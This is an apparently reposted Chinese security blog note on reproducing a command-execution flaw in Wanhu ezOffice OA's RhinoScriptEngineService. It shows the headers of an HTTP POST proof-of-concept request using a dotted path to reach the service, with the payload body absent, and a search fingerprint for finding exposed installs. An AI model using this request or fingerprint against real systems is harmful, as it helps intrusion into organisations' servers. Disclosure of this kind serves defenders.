万户OA ezOffice RhinoScriptEngineService 命令执行漏洞复现

admin 2024年3月13日12:46:47评论39 views字数 296阅读0分59秒阅读模式

万户OA ezOffice RhinoScriptEngineService 命令执行漏洞复现

影响范围

万户ezOFFICE协同管理平台

 漏洞poc

POST /defaultroot/services/./././RhinoScriptEngineService HTTP/1.1Host: Accept-Encoding: gzip, deflate, brContent-Length: 1166Content-Type: text/xml; charset=utf-8SOAPAction: Connection: closexml

 漏洞复现

app="万户网络-ezOFFICE"

万户OA ezOffice RhinoScriptEngineService 命令执行漏洞复现

原文始发于微信公众号(小白菜安全):万户OA ezOffice RhinoScriptEngineService 命令执行漏洞复现

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月13日12:46:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   万户OA ezOffice RhinoScriptEngineService 命令执行漏洞复现https://cn-sec.com/archives/2570901.html

发表评论

匿名网友 填写信息